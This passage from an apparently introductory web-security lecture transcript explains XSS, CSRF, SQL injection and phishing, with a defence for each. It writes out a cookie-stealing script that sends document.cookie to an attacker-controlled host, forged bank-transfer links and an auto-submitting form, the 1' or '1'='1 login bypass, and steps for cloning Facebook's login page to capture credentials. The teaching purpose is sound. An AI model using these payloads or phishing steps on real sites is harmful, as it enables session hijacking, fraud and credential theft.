of HTTPS exist as well.
But you're going to start
getting notifications.
And you may have seen
these as well in green.
If you are using HTTPS and
you log into something,
you'll see a little lock icon here
and you'll be told that it is secure.
And again, this is just
because human beings
tend not to be as concerned
about their digital privacy
and their digital security
when using the internet.
And now the technology is
trying to provide clues and tips
to entice you to be more
concerned about these things.
Now let's take a look
at a couple of attacks
that are derived from
things we typically consider
to be advantages of using the internet.
The first of these is the idea
of cross-site scripting, XSS.
We've previously discussed
this idea of the distinction
between server-side code
and client-side code.
Client-side code, recall, is
something that runs locally
on our computer where
our browser, for example,
is expected to interpret
and execute that code.
Server-side code is run on the server.
And when we get
information from a server,
we're not getting back
the actual lines of code.
We're getting back the output of that
code having run in the first place.
So for example, there might be some code
on the server, some Python code or PHP
code that generates HTML for us.
The actual Python or PHP code in this
example would be server-side code.
We don't actually ever see that code.
We only see the output of that code.
A cross-site script
vulnerability exists when
an adversary is able to trick a client's
browser to run something locally.
And it will do something that
presumably the person, the client,
didn't actually intend to do.
Let's take a look at an example
of this using a very simple web
server called Flask.
We have here some Python code.
And don't be too worried if this
doesn't all make sense to you.
It's just a pretty short, simple
web server that does two things.
So this is just some
bookkeeping stuff in Flask.
And Flask is a package of Python
that is used to create web servers.
This web server has two
things, though, that it does.
The first is when I visit
slash on my web server--
so let's say this is Doug's site.
If I go to dougssite.com, which you may
not actually explicitly type anymore
but most browsers just
add it, slash just
means the root page of your server.
I'm going to call the following
function whose name happens
to be called index in this case.
Return hello world.
And what this basically means
is if I visit dougspage.com/,
what I receive is an HTML page
whose content is just hello world.
So it's just an HTML file
that says hello world.
Again, this code here
is all server-side code.
You don't actually see this code.
You only see the output of this
code, which is this here, this HTML.
It's just a simple string
in this case, but it would
be interpreted by the browser as HTML.
If, however, I get a 404--
a 404 is a not found error. it means
the page I requested doesn't exist.
And since I've only defined the
behavior for literally one page,
slash the index page of my server, then
I want to call this function not found.
Return not found plus whatever
page I tried to visit.
So it basically is another very simple
page, much like hello world here,
where instead of saying hello
world, it says not found.
And then it also concatenates onto
the very end of that whatever page
I tried to visit.
This is a major cross-site
scripting vulnerability.
And let's see why.
Let's imagine I go to
/foo, so dougspage/com/foo.
Recall that our error handler function,
which I've reproduced down here,
will return not found /foo.
Seems pretty reasonable.
It seems like the behavior I
expected or intended to have happen.
But what about if I go
to a page like this one?
So this is what I literally type in the
browser, dougspage.com/ angle bracket,
script, angle bracket alert(hi)
and then a closed script tag there.
This script here, script
here, looks a lot like HTML.
And in fact, when the browser sees
this, it will interpret it as HTML.
And so I will get returned by visiting
this page not found And then everything
here except for the
leading slash, which means
that when I receive this and my
client is interpreting the HTML,
I'm going to generate an alert.
What is an alert?
Well, if you've ever gone to a
website and had a pop-up box display
some information, you have to
click OK or click X to make
it go away, that's what an alert is.
So I visit this page on
my website, I've actually
tricked my browser into
giving me a JavaScript alert,
or I've tricked whoever
visits this page's browser
to give me a JavaScript alert.
So that's probably not
exactly a good thing.
But it can get a little bit
more nefarious than that.
Let's instead imagine-- instead
of having this be on my server,
it might be easier to imagine it
like this, that this is what I wrote.
This script tag here's what I wrote
into my Facebook profile, for example.
So Facebook gives you the ability
to write a short little bio
about yourself.
Let's imagine that my bio was this
script document.write, image source,
and then I have a hacker
URL and everything.
And imagine that I own hacker URL.
So I own hacker URL and I wrote
this in my Facebook profile.
Assuming that Facebook did not
defend against cross-site scripting
attacks, which they do, but
assuming that they did not,
anytime somebody visited
my profile, their browser
would be forced to contend
with this script tag here.
Why?
Because they're trying
to visit my profile page.
My profile page contains
literally these characters which
are going to be interpreted as HTML.
And it's going to add document.write--
that's a JavaScript way of saying add
the following line in addition
to the HTML of the page--
image source equals hacker
url?cookie= and then document.cookie.
So imagine that I, again,
control hacker URL.
Presumably, as somebody
who is running a website,
I also maintain logs of every time
somebody tries to access my website,
what page on my site
they're trying to visit.
If somebody goes to my Facebook
profile and executes this,
I'm going to get notified via my hacker
URL logs that somebody has tried to go
to that page ?cookie=
and then document.cookie.
Now, document.cookie in
this case, because this
exists on my Facebook profile, is
an individual's cookie for Facebook.
So here what I am
doing-- again, Facebook
does defend against
cross-site scripting attacks,
so this can't actually
happen on Facebook.
But assuming that they did not
defend against them adequately,
what I'm basically doing
is getting told via my log
that somebody tried to
visit some page on my URL,
but the page that they
tried to visit, I'm
plugging in and basically stealing
the cookie that they use for Facebook.
And a cookie, recall, is
sort of like a hand stamp.
It's basically me, instead
of having to re-log
into Facebook every time I want
to use it, going up to Facebook
and saying, here.
You've already verified my identity.
Just take a look at
this, and you get let in.
And now I hypothetically know
someone else's Facebook cookie.
And if I was clever, I
could try and use that
to change what my Facebook cookie
is to that person's Facebook cookie.
And then suddenly I'm able to log in
and view their profile and act as them.
This image tag here
is just a clever trick
because the idea is that it's trying
to pull some resource from my site.
It doesn't exist.
I don't have a list of all
the cookies on Facebook.
But I'm being told that somebody is
trying to access this URL on my site.
So the image tag is just
sort of a trick to force
it to log something on my hacker URL.
But the idea here is that I would
be able to steal somebody's Facebook
cookie where this attack's
not well-defended against.
So what techniques can we
use either for our own sites
when we are running to avoid
cross-site scripting vulnerabilities
or to protect against cross-site
scripting vulnerabilities?
The first technique that we can
use is to sanitize, so to speak,
all of the inputs that
come in to our page.
So let's take a look at how
exactly we might do this.
So it turns out that
there are things called
HTML entities, which are other ways of
representing certain characters in HTML
that might be considered special or
control characters, so things like,
for example, this or this.
Typically, when a browser
sees a character left
angle bracket or right
angle bracket, it's
going to automatically interpret that as
some HTML that it should then process.
So in the example I just
showed a moment ago,
I was using the fact that whenever
it sees angle brackets with script
around it, they're going to
try and interpret whatever
is between those tags as a script.
One way for me to prevent that
from being interpreted as a script
is to call this or call this something
else other than just left angle bracket
and right angle bracket.
And it turns out that there are these
things called HTML entities that
can be used to refer to
these characters instead,
such that if I sanitize
my input in such a way
that every time somebody literally
typed the character left angle bracket,
I had written some code that
automatically took that and changed it
into ampersand lt;.
And then every time somebody
wrote a greater than character,
or right angle bracket, I changed
that in the code to ampersand gt;.
Then when my page was responsible for
processing or interpreting something,
it wouldn't interpret this-- it would
still display this character as a left
angle bracket or less than-- that's
what the lt stands for here--
or a right angle bracket, greater than.
That's what the gt stands for there.
It would literally just show those
characters and not treat them as HTML.
So that's the idea of what it means
to sanitize input when we're talking
about HTML entities, for example.
Another thing that we could do is
just disable JavaScript entirely.
This would have some
upsides and some downsides.
The upside is you're pretty protected
against cross-site scripting
vulnerabilities because they're usually
going to be introduced via JavaScript.
The downside is JavaScript
is pretty convenient.
It's nice.
It makes for a better user experience.
Sometimes there might
be parts of our page
that just don't work if
JavaScript is completely disabled,
and so trade-offs there.
You're protecting yourself,
but you might be doing
other sorts of non-material damage.
Or we could decide to just handle
the JavaScript in a special way.
So for example, we
might not allow what's
called inline JavaScript, for
example, like the script tags
that I just showed a moment ago.
But we might allow JavaScripts
written in separate JavaScript files
which can also be linked
into your HTML pages.
So those would be allowed, but inline
JavaScript, like what we just saw,
would not be allowed.
We could sandbox the JavaScript and
run it separately somewhere else first
to see if it does something weird,
and if it doesn't do something weird,
then allow it to be displayed.
We could also execute the
content security policy.
Content security policy
is another header
that we can add to our HTML
pages or HTTP responses.
And we can define certain
behavior to happen
such that will allow certain lines or
certain types of JavaScript through
but not others.
Now, there's another
type of attack that can
be used that relies heavily on the fact
that we use cookies so extensively,
and that is a cross-site
request forgery, or a CSRF.
Now, cross-eyed scripting
attacks generally
involve receiving some content
and the client's browser
being tricked into doing something
locally that it didn't want to do.
In a CSRF request, or
CSRF attack, rather,
the trick is we're relying
on the fact that there
is a cookie that can
be exploited to make
a an outbound request, an outbound HTTP
request that we did not intend to make.
And again, this relies
extensively on cookies
because they are this shorthand,
short-form way to log into something.
And we can make a fraudulent
request appear legitimate
if we can rely on someone's cookie.
Now, again, if you ever use
a cloud service for example,
they're going to have CSRF
defenses built into them.
This is really if you're
building a simple site
and you don't defend against this.
Flask, for example, does not defend
against this particularly well,
but Flask is a very simple
web framework for servers.
They're generally going to be
much more complicated than that
and have much more additional
functionality to be more featurefull.
So let's walk through what
these cross-site request
forgeries might look like.
And for context, let's imagine
that I send you an email
asking you to click on some URL.
So you're going to click on this link.
It's going to redirect you to some page.
Maybe that page looks
something like this.
It's pretty simple,
not much going on here.
I have a body.
And inside of it I have one more link.
And the link is http://hackbank.com/
transfertodoug=amt500.
Now, perhaps you don't hover over it
and see the link at the beginning of it.
But maybe you are a
customer of Hack Bank.
And maybe I know that you're a customer
of Hack Bank such that if you click
on this link and if you happen to be
logged in, and if you happen to have
your cookie set for hackbank.com, and
this was the way that they actually
executed transfers, by having you go
to /transfer and say to whom you want
to send money and in what amount--
And fortunately, most banks
don't actually do this.
Usually, if you're going to do something
that manipulates the database, as this
would, because it's going to be
transferring some amount of money
somewhere that would be
via HTTP POST request--
this is just a straightforward
GET request I'm making here.
If you were logged in,
though, to Hack Bank,
or if you're cookie
for Hack Bank was set
and you clicked on this link,
hypothetically, a transfer of $500--
again, assuming that
this was how you did it,
you specified a person and
you specified an amount--
would be transferred from your
account to presumably my account.
That's probably not
something you intended to do.
So that would be an example of why
this is a cross-site request forgery.
It's a legitimate request.
It appears that you intended to
do this because it came from you.
It's using your cookie.
But you didn't actually
intend for it to happen.
Here's another example.
You click on the link in my email
and you get brought to this page.
So there's not actually even a
second link to click anymore.
Now it's just trying to load an image.
Now, looking at this URL, we can
tell there's not an image there.
It doesn't end in jpeg
or .pmg or the like.
It's the same URL as before.
But my browser sees image source
equals something and says,
well, I'm at least going
to try and go to that URL
and see if there is an
image there to load for you.
Again, you just click on
the link in the email.
This page loads.
My browser tries to go to this
page, or your browser in this case
tries to go to this page
to load the image there.
But in so doing, it's, again,
executing this unintended transfer,
relying on your cookie at hackbank.com.
Another example of this might be a form.
So again, it appears that you
click on the link in the email.
You get brought to a form that just has
now just a button at the bottom of it
that says Click Here.
And the reason it just
has a button, even
though there's other stuff written, is
that those first two fields are hidden.
They are type equals hidden,
which means you wouldn't actually
see them when you load your browser.
Now, contrast this, for
example, with a field
whose type is text, which you might
see if you're doing a straightforward
login.
You would type characters in and
see the actual characters appear.
That's text versus a password
field where you would
type characters in and see all stars.
It would visually
obscure what you typed.
The action of this
form, or so to say where
the form-- what happens when you click
on the Submit button at the bottom
is the same as before.
It's hackbank.com/transfer.
And then I'm using
these parameters here;
to Doug, the amount of $500, Click Here.
Now I actually am using a
notice also POST request
to try to initiate this
transfer, again, assuming
that this was how Hack Bank structured
transfer requests in this way.
So if you clicked here and this
was otherwise validly structured
and you were logged in, or your
cookie was valid for Hack Bank,
then this would initiate
a transfer of $500.
And I can play another similar trick to
what I did a moment ago with the image
by doing something like this
where, when the page is loaded,
instantly submit this form.
So you don't even have
to click here anymore.
It's just going to go
through the document,
document being JavaScript's way of
referring to the entire web page,
find the first form,
form zeros, assuming
this is the first form on
the page, and just submit it.
Doesn't matter what else is going on.
Just submit this form.
That would also initiate transfer if
you clicked on that link from my email.
So a quick summary of these
two different types of attacks.
Cross-site scripting
attacks, the adversary
tricks you into executing code on
your browser to do something locally
that you probably did not intend.
And a cross-site request
forgery, something
that appears to be a legitimate
request from your browser
because it's relying on cookies, your
ostensibly logged in in that way,
but you don't actually
mean to make that request.
Now let's talk about a
couple of vulnerabilities
that exist in the context
of a database, which I
know you've discussed recently as well.
So imagine that I have a
table of users on my database
that looks like this, that each of them
has an ID number, they have a username,
and they have a password.
Now, the obvious
vulnerability here is I really
shouldn't be storing my users'
passwords like this in the clear.
If somebody were to ever hack and
get a hold of this database file,
that's really, really bad.
I am not taking best practices to
protect my customers' information.
So I want to avoid doing that.
So instead what I might do, as we've
discussed, is hash their passwords,
run them through some hash function
so that when they're actually stored,
they get stored looking
something like this.
You have no idea what the
original password was.
And because it's a
hash, it's irreversible.
You should not be able
to undo what I did
when I ran through the hash function.
But there's actually still
a vulnerability here.
And the vulnerability
here is not technical.
It's human again.
And the vulnerability that
exists here is that we see--
we're using a hash function,
so it's deterministic.
When we pass some data through it, we're
going to get the same output every time
we pass data through it.
And two of our users, Charlie
and Eric, have the same hash.
We saw this makes sense,
because if we go back a moment,
they also had the same actual password
when it was stored in plain text.
We've gone out of our way to try and
defend against that by hashing it.
But somebody who gets a hold of
this database file, for example,
they hack into it, they get it, they'll
see two people have the same password.
And maybe this is a very
small subset of my user base.
And maybe there's hundreds
of thousands of people.
And maybe 10% of them
all have the same hash.
Well, again, human beings, we are not
the best at defending our own stuff.
It's a sad truth that
the most common password
is password followed by some of these
other examples we had a second ago.
All of these are pretty bad passwords.
They're all on the list of some of
the most commonly used passwords
for all services, which means
that if you see a hash like this,
it doesn't matter that
we have taken steps
to protect our users against this.
If we see a hash like this many, many
times in our database, a clever hacker,
a clever adversary
might think, oh, well,
I'm seeing this password
10% of the time,
so I'm going to guess that Charlie's
password for the service is 12345
and they're wrong.
And then they'll maybe try abcdef
and they're wrong, and then maybe try
password and they're right.
And then all of a sudden every
time they see that hash, they
can assume that the password is password
for every single one of those users.
So again, nothing we can do as
technologists to solve this problem.
This is really just
getting folks to understand
that using different passwords,
using non-standard passwords,
is really important.
That's why we talked about password
managers and maybe not even knowing
your own passwords in a prior lecture.
There's another problem that can exist,
though, with databases, in particular,
when we see screens like this.
So this is a contrived login screen
that has a username and password
field And a Forgot Password
button whose purpose in life
is, if you type in your
email address and you--
which is the username
in this case, and you
have the Forgot Password box
checked, and you try and click login,
instead of actually logging you in,
it's going to email you, hopefully,
a link to your password, not
your actual password for reasons
we previously discussed as well.
But what if when we click
on this button we see this?
OK.
We've emailed you a link
to change your password.
Does that seem inherently problematic?
Perhaps not.
But what about if you see this as well?
Somebody might see this if
they're logged in as well.
Sorry, no user with that email address.
Does that perhaps seem problematic
when you compare it against this?
This is an example of something
called information leakage.
Perhaps an adversary has
hacked some other database
where folks were not being
as secure with credentials.
And so they have a whole set of email
addresses mapped to credentials.
And because human beings tend
to reuse the same credentials
on multiple different services,
they are trying different services
that they believe that
these users might also
use using those same username
and password combinations.
If this is the way that we field these
types of forgot password inquiries,
we're revealing some
information potentially.
If Alice is a user, we're now
saying, yes, Alice is a user of this.
Try this password.
If we get something like this, then
the adversary might not bother trying.
They've realized, oh, Alice
is not a user of this service.
And even if they're not trying to hack
into it, if we do something like this,
we're also telling that adversary
quite a bit about Alice.
Now we know Alice uses this service,
and this service, and this service,
and not this service.
And they can sort of create a
picture of who Alice might be.
They're sort of using her digital
footprint to understand more about her.
A better response in this case
might be to say something like this,
request received.
If you're in our system, you'll receive
an email with instructions shortly.
That's not tipping
our hand either way as
to whether the user is in the
database or not in the database.
No information leakage here,
and generally a better way
to protect our customer's privacy.
Now, that's not the only problem
that we can have with databases.
We've alluded to this
idea of SQL injection.
And there's this comment that
gets the rounds quite a bit
when we talk about SQL injection
from a web comic called
XKCD that involves a SQL injection
attack, which is basically
providing some information that--
or providing some text or some query
that we want to make to a database
where that query actually
does something unintended.
It actually itself is SQL as opposed
to just plugging in some parameter,
like what is your name, and then
searching the database for that name.
Instead of giving you my
name, I might give you
something that is actually
a SQL query that's
going to be executed that
you don't want me to execute.
So let's see an example
of how this might work.
So here's another simple
username and password field.
And in this example, I've written my
password field poorly intentionally
for purposes of the example
so that it will actually
show you the text that is
typed as opposed to showing
you stars like a password field should.
So this is something that the user
sees when they access my site.
And perhaps on the back end in the
server-side code, inside of Python
somewhere I have written a SQL
query that looks like the following.
When the login button is clicked,
execute the following SQL query.
SELECT star from users where
username equals uname--
and uname here in yellow referring
to whatever was typed in this box--
and password equals
pword, where, again, pword
is referring to whatever
was typed in this box.
So we're doing a SQL query
to select star from users,
get all of the information
from the users table
where the username equals
whatever they typed in that box
and the password equals
whatever they typed in that box.
And so, for example,
if I have somebody who
logs in with the username
Alice and the password
12345, what the query would actually
look like with these values plugged
into it might look something like this;
SELECT star from users where username
equals Alice and password equals 12345.
If there is nobody with username Alice
or Alice's password is not 12345,
then this will fail.
Both of those conditions
need to be true.
But what about this?
Someone whose username is hacker and
their password is 1' or '1' equals '1.
That looks pretty weird.
And the reason that
that looks pretty weird
is because this is an
attempt to inject SQL,
to trick SQL into doing something that
is presumably not intended by the code
that we wrote.
Now, it probably helps to take a
look at it plugging the data in
to see what exactly this is going to do.
SELECT star from users where
username equals hacker or--
excuse me, and password equals
'1' or and so on and so on.
Maybe I do have a person whose
username actually is hacker,
but that's probably not their password.
That doesn't matter.
I'm still going to be
able to log in if I
have somebody whose username is hacker.
And the reason for that
is because of this or.
I have sort of short circuited
the end of the SQL query.
I have this quote mark that demarcates
the end of what the user presumably
typed in.
But I've actually literally
typed those into my password
to trick SQL such that if
hacker's password equals 1,
it just happens to literally be the
character 1, OK, I have succeeded.
I guess that's a really
bad password, and I
shouldn't be able to log it in that
way, but maybe that is the case
and I'm able to log in.
But even if not, this
other thing is true.
'1' does equal '1'.
So as long as somebody whose username
is hacker exists in the database,
I am now able to log in as
hacker because this is true.
This part's probably not true, right?
It's unlikely that their password is 1.
Regardless of what their password
is, this part actually is true.
It's a very simple SQL injection attack.
I'm basically logging in as someone
who I'm presumably not supposed
to be able to log in as, but it
illustrates the kind of thing
that could happen.
You are allowing people
to bypass logins.
Now, it could get worse if your
database administrator username
is admin or something very common.
The default for this is typically admin.
This would potentially
give people the ability
to be database
administrators, that they're
able to execute exactly this
kind of trick on the admin user.
Now they have administrative
access to your database, which
means they can do things like
manipulate the data in the database,
change things, add things, delete things
that you don't want to have deleted.
And in the case of a database,
deletion is pretty permanent.
You can't undo a delete most
of the time in a database
as the way you might be
able to do with other files.
Now, are there techniques to
avoid this kind of attack?
Fortunately, there are.
Right now I'd like just to just
take a look at a very simple Python
program that replicates
the kind of thing
that one could do in a more
robust, more complex SQL situation.
So let's pull up a program
here where we're just
simulating this idea
of a SQL injection just
to show you how it's not that
difficult to defend against it.
So let's pull up the code
here in this file login.py.
So there's not that much going on here.
I have x equals input username.
So x, recall, is a Python variable.
And input username is basically going
to prompt the user with the string
username and then expect them
to type something after that.
And then we do exactly the
same thing with password
except storing the result there in y.
So whatever the user types after
username will get stored in x.
Whatever they type after
password will get stored in y.
And then here I'm just going to print.
And in the SQL context, this would be
the query that actually gets executed.
So imagine that that's
what's happening instead.
SELECT star from users where username
equals and then this symbol here,
'[? x ?]'.
What I'm doing here is just
using a Python-formatted string.
That's what this f
here-- it's not a typo--
at the beginning means, is I'm going to
plug in whatever the person, the user,
typed at the first prompt,
which I stored in x here,
and whatever the user typed the
second prompt that's store in y there.
So let's actually just run this program.
So let's pop open here for a second.
The name of this program is
login.py, so I'm going to type python
login.py, Enter.
Username, Doug.
Password, 12345.
And then the query, hypothetically, that
would get executed if I constructed it
in this way is SELECT star
from users where username
equals Doug and password equals 12345.
Seems reasonable.
But if I try and do the adversary
thing that I did a moment ago,
username equals Doug, password
equals 1' or '1' equals '1, not
a final single quote, and I hit
Enter, then I end up with SELECT star
from users where username equals Doug
and password equals 1 or 1 equals 1.
And the latter part of that is true.
The former part is false.
But it's good enough that
I would be able to log in
if I did something like that.
But we want to try and get around that.
So now let's take a look at a second
file that might solve this problem.
So I'm going to open up
login2.py in my editor here.
So now it starts out exactly the same,
x equals something, y equals something.
But I'm making a pretty
basic substitution.
I'm replacing every time that I see
single quotes with double quotes.
So I'm replacing every
instance of single quote,
and I have to preface
it with a backslash.
Because notice I'm actually using
single quotes to identify the character.
It just so happens that it's to indicate
that I'm trying to substitute something
which I'm putting in single quotes.
The thing I'm trying to substitute
actually is a single quote,
and so I need to put a
backslash in front of it
to escape that character
such that it actually
gets treated as a single quotation
mark character as opposed
to some special Python--
Python's not going to try and
interpret it in some other way.
So I want to replace every instance of
a single quote in x with a double quote,
and I want to replace every
instance of a single quote in y
with a double quote.
Now, why do I want to do that?
Because notice in my
actual Python string here
I'm using single quotes to set
off the variables for purposes
of SQL's interpretation of them.
So where the user name
equals this string,
I'm using single quotes to do that.
So if my username or my password
also contained single quotation mark
characters, when SQL
was interpreting it,
it might think that the next single
quote character it sees is the end.
I'm done with what I've prompted.
And that's exactly how I tricked
it in the previous example.
I used that first single quote,
which seemed kind of random and out
of nowhere, to trick SQL into
thinking I'm done with this.
Then I used the keyword or back
now into a SQL and not some string
that I'm searching for, and then I
would continue this trick going forward.
So this is designed to
eliminate all the single quotes,
because the single quotes
mean something very special
in the context of my SQL query itself.
If you're actually using SQL
libraries that are tied into Python,
the ability to replace things is
much more robust than this example.
But even this very
simple example where I'm
doing just this very basic
substitution is good enough
to get around the injection
attack that we just looked at.
So this is now in login2.py.
Let's do this.
Let's Python login2.py.
And we'll start out the same way.
We'll do Doug and 12345.
And it appears that nothing has changed.
The behavior is otherwise
identical because I'm not
trying to do any tricks like that.
SELECT star from users where username
equals Doug and password equals 12345.
But if I now try that same
trick that I did a moment ago,
so password is 1' or '1'
equals '1 and I hit Enter,
now I'm not subject to that same SQL
injection anymore because I'm trying
to select all the information from the
users table where the username is Doug
and the password equals--
And notice that here is
the first single quote.
Here is the second one.
So it's thinking that entire
thing now is the password.
Only if my password is
literally 1" or "1" equals "1,
then I would be literally logging in.
If that happened to be my
password, this would work.
But otherwise I've escaped.
I've stopped the adversary
from being able to leverage
a simple trick like this
to break in to my database
when perhaps they're
not intended to do so.
And again, in actual SQL injection
defense, the substitutions that we make
are much more complicated than this.
We're not just looking for single quote
characters and double quote characters,
but we're considering semicolons
or any other special characters
that SQL would interpret
as part of a statement.
We can escape those out so
that users could literally
use single quotes or semicolons
or the like in their passwords
without necessarily compromising
the integrity of the entire database
overall.
So we've taken a look at several of
the most common, most obvious ways
that an adversary might be
able to extract information
either from a business or an individual.
And these ways are kind of
attention-getting in some context.
But let's focus now-- let's
go back and bring things
full circle to something
I've mentioned many times,
which is humans are the core fatal
flaw in all of these security things
that we're dealing with here.
And so let's bring things
full circle by talking
about phishing, what phishing is.
So phishing is just an attempt
by an adversary to prey upon us
and our unfortunate general ignorance
of basic security protocols.
So it's just an attempt
to socially engineer,
basically, information out of someone.
You pretend to be
someone that you are not.
And if you do so
convincingly enough, you
might be able to extract
information about that person.
Now, phishing you'll also see
in other contexts that are--
computer scientists like to
be clever with their wordplay.
You'll see things like netting, which
is basically a phishing attack that
launches against many
people at once, hoping
they'll be able to get one or two.
There's spear phishing,
which is a phishing
attack that targets one specific person
trying to get information from them.
And then there's whaling,
which is a phishing attack that
is targeted against somebody who is
perceived to have a lot of information
or whose information is
particularly valuable such
that you'd be phishing
for some big whale.
Now, one of the most obvious and
easy types of phishing attack
looks like this.
It's a simple URL substitution.
This is how we can write a link in HTML.
A is the HTML tag for anchor,
which we use for hyperlinks.
Href is where we are going to.
And then we also have the ability to
specify some text at the end of that.
These two items do not have
to match, as you can see here.
I can say we're going to URL2
but actually send you to URL1.
This is an incredibly common way
to get information from somebody.
They think they're going one place but
they're actually going someplace else.
And to show you, as a very
basic example, just how easy it
is to potentially trick somebody into
going somewhere they're not supposed to
and potentially then
revealing credentials as well,
let's just take a simple
example here with Facebook.
And why don't we just take a moment
to build our own version of Facebook
and see if we can't get somebody to
potentially reveal information to us?
So let's imagine that I
have acquired some domain
name that's really
similar to Facebook.com,
like it's off by one character.
It's a common typo.
For example fs maybe is a common thing.
People mistype the A
or something like that
that would be really not necessarily
obvious to somebody at the outset.
One way that I might be able to just
take advantage of somebody's thinking
that they're logging into
Facebook is to make a page that
looks exactly the same as Facebook.
That's actually not
very difficult to do.
All you have to do is
open up Facebook here.
And because its HTML is available
to me, I can right click on it,
view page source, take
a second to load here--
Facebook is a pretty big site--
and then I can just control A, copy,
select all, copy all of the content,
and paste this in to my
index.html, and we will save.
And then we'll head back
into our terminal here,
and I will start Chrome on
the file index.html, which
is the file that I literally just
saved my Facebook information in.
So start Chrome index.html.
You'll notice that it
brings me to this URL
here, which is the file
for where I currently live,
or where this file currently lives.
And this page looks like Facebook,
except for the fact that,
when I log in, I then
get redirected back
to something that actually is Facebook
and is not something that I control.
But at the outset, my page
here at the very beginning
looks identical to Facebook.
Now, the trick here
would be to do something
so that the user would provide
information here in the email box
and then here in the password field
such that when they click Login,
I might be able to get
that information from them.
Maybe I just am waiting to
capture their information.
So the next step for me might be to go
back into my random set of stuff here.
There's a lot of random code
that we don't really care about.
But the one thing I do care
about is what happens when
somebody clicks on this Login button.
That is interesting to me.
So I'm going to go through
this and just do control F,
control F just being
find, the string login.
That's the text that's
literally written on the button,
so hopefully I'll find that somewhere.
I'm told I have eight results.
So this is, if I just
kind of look around
for context to try
and figure out where I
am in the code, the title of
something, so that's probably not it.
So I don't want to go there.
Create an account or login,
not quite what I'm looking for.
So go the next one.
OK, here we go, input
value equals login.
So now I found an input
that is called login.
So this is presumably a button
that's presumably part of some form.
So if I scroll up a little
bit higher, hopefully I
will find a form, which I do, form ID.
And it has an action.
The action is to go to
this particular page,
facebook.com/login/ and so on and so on.
But maybe I want to
send it somewhere else.
So if I replace this entire URL with
where I actually want to send the user,
where maybe I'm going to
capture their information,
maybe I'll store this in login.html.
And so that's what's
going to come in here.
And then we'll save the file such
that our changes have been captured.
So presumably what should
happen is now, when
you click on the Login
button in my fake Facebook,
you instead get redirected to login.html
rather than the Facebook actual login
as we saw just a moment ago.
So let's try again.
We'll go back here to
our fake Facebook page.
We will refresh so that
we get our new content.
Remember, we just
changed the HTML content,
so we actually need to reload
it so that our browser has it.
And we'll type in abc@cs50.net and then
some password here and click Login,
and we get redirected here.
Sorry, we are unable to
log you in at this time.
But notice we're still
in a file that I created.
I didn't show you login.html, but
that's exactly what I put there.
Now, I'm not actually going
to phish for information here.
And I'm going to do something
that would arguably vio--
even though I'm using
fake data here, I'm
not going to do something that
would violate the terms of service
or get myself in trouble by actually
attempting to do some phishing here.
But imagine instead of some HTML
I had some Python code that was
able to read the data from that field.
We saw that a moment ago
with passwords, right?
We know that the possibility exists
that if the user types something
into a field, we have the
ability to extract it.
What I could do here is very simple.
I could just read those two fields where
they typed a username and a password
but then display this content.
Perhaps it's been the case that
you've gone to some website
and seen, oh, yeah, sorry, the server
can't handle this request right now,
or something along those lines.
And you maybe think nothing of it.
Or maybe I even would then have
a link here that says, try again.
And if you click Try Again,
it would bring you back
to Facebook's actual login where you
would then enter your credentials
and try again and perhaps
think everything was fine.
But if on this login page I had
extracted your username and password
by tricking you into thinking
you were logging into Facebook,
and then maybe I save those
in some file somewhere
and then just display this to you,
you think, ah, they just had an error.
Things are a little bit busy.
I'll try again.
And when you try again, it works.
It's really that easy.
And the way to avoid phishing
expeditions, so to speak,
are just to be mindful
of what you're doing.
Take a look at the URL bar to
make sure that you're on the page
that you think you're on.
Hopefully you've come
away now with a bit more
of an understanding of
cybersecurity and some
of the best practices that
are put in place to deal
with potential cybersecurity threats.
Now it's incumbent upon
us to use the technology
that we have available to help us
protect ourselves from ourselves,
but not only ourselves and our own data,
but also working to protect our clients
and their data as well.
